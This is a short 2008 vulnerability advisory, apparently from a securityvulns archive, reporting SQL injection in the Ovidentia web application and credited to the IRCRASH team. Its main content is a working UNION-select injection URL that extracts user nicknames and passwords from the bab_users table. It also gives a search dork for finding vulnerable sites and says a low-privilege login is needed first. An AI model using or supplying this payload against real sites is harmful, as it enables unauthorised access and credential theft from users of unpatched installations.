Ovidentia Sql Injection

2008-08-12T00:00:00
ID SECURITYVULNS:DOC:20325
Type securityvulns
Reporter Securityvulns
Modified 2008-08-12T00:00:00

Description

Ovidentia Sql Injection

AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))

Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))

Our Site : Http://IRCRASH.COM

IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)

Script Download : www.ovidentia.org

DORK : "Powered by Ovidentia"

[Bug]

http://Site/index.php?tg=contact&idx=modify&item=-99999'+union+select+0,1,2,concat(0x6E69636B6E616D65,0x3A,nickname),concat(0x70617373776F7264,0x3A,password),5,6,7,8,9,10,11,12,13,14+from+bab_users/*

[Note]

You must login by a simple user and then use bug ;)

Site : Http://IRCRASH.COM

################################ TNX GOD